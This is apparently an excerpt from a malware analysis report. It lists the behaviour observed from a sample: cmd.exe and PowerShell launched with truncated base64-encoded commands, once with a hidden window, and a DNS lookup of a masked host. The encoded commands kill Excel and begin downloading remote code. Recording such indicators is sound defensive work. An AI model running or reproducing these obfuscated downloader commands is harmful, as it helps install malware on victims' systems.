Technical Information
- '<SYSTEM32>\cmd.exe' & /K CD C: & PowerShell -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAa...
- DNS ASK l4######y-site.etempurl.com
- '<SYSTEM32>\cmd.exe' & /K CD C: & PowerShell -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAa...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAb...